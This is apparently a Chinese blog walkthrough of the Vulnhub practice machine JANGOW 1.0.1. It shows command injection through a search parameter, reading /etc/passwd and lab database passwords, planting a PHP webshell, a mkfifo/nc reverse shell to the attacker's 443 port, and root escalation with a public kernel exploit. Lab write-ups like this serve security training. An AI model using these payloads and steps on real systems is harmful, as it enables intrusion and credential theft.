Vulnhub系列靶机---JANGOW 1.0.1

文章目录

      • 网卡配置
      • 信息收集
        • 主机发现
        • 端口扫描
      • 漏洞利用
        • 反弹Shell
        • 提权

靶机文档:JANGOW 1.0.1

下载地址:Download (Mirror)

难易程度:.

Vulnhub系列靶机---JANGOW 1.0.1_第1张图片

网卡配置

水果味儿

信息收集

主机发现

Vulnhub系列靶机---JANGOW 1.0.1_第2张图片

端口扫描

Vulnhub系列靶机---JANGOW 1.0.1_第3张图片

访问80端口

Vulnhub系列靶机---JANGOW 1.0.1_第4张图片

点击site目录

点击页面上方的一个选项,发现Buscar的页面空白,而且地址栏的url看着可以输入一些东西

http://192.168.8.16/site/busque.php?buscar=

Vulnhub系列靶机---JANGOW 1.0.1_第5张图片

?buscar=后面加上pwd,显示了当前路径

/site/busque.php?buscar=pwd

Vulnhub系列靶机---JANGOW 1.0.1_第6张图片

/site/busque.php?buscar=cat%20/etc/passwd

Vulnhub系列靶机---JANGOW 1.0.1_第7张图片

/site/busque.php?buscar=ls%20-a 发现了wordpress

Vulnhub系列靶机---JANGOW 1.0.1_第8张图片

查看wordpress里都有什么文件 ls wordpress
Vulnhub系列靶机---JANGOW 1.0.1_第9张图片

查看cat%20wordpress/config.php,页面空白,需要查看页面源代码

Vulnhub系列靶机---JANGOW 1.0.1_第10张图片

发现了数据库配置

$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";

漏洞利用

使用命令执行,写入一句话木马

echo ' >6868.php

Vulnhub系列靶机---JANGOW 1.0.1_第11张图片

使用蚁剑连接一句话,拿到webshell

Vulnhub系列靶机---JANGOW 1.0.1_第12张图片

site目录同级下,有一个隐藏的.backup文件

Vulnhub系列靶机---JANGOW 1.0.1_第13张图片

$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";

Vulnhub系列靶机---JANGOW 1.0.1_第14张图片

拿到webshell权限极低,啥也干不了

反弹Shell

查看攻略,该网站限制了一些端口,只能通过443端口进行访问

/etc/ufw/applications.d/

Vulnhub系列靶机---JANGOW 1.0.1_第15张图片

查看apache2-utils.ufw.profile文件

Vulnhub系列靶机---JANGOW 1.0.1_第16张图片

上传木马

 system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.8 443 >/tmp/f');?>

Vulnhub系列靶机---JANGOW 1.0.1_第17张图片

kali监听443端口

访问该木马文件

Vulnhub系列靶机---JANGOW 1.0.1_第18张图片

成功反弹到

Vulnhub系列靶机---JANGOW 1.0.1_第19张图片

提权

交换shell

python3 -c "import pty;pty.spawn('/bin/bash')"

查看内核版本

在这里插入图片描述

搜索相关漏洞

searchsploit ubuntu 4.4.0-31

Vulnhub系列靶机---JANGOW 1.0.1_第20张图片

searchsploit  -p linux/local/45010.c

Vulnhub系列靶机---JANGOW 1.0.1_第21张图片

45010.c上传的靶机

我先发送到我本机,然后本机上传到蚁剑上

image-20230920215827476

Vulnhub系列靶机---JANGOW 1.0.1_第22张图片

赋予可执行权限,然后进行编译

Vulnhub系列靶机---JANGOW 1.0.1_第23张图片

上传一个a.out文件,执行它

Vulnhub系列靶机---JANGOW 1.0.1_第24张图片

切到/root目录下

Vulnhub系列靶机---JANGOW 1.0.1_第25张图片

你可能感兴趣的:(#,Vulnhub靶机系列,vulnhub,web安全,网络安全,安全)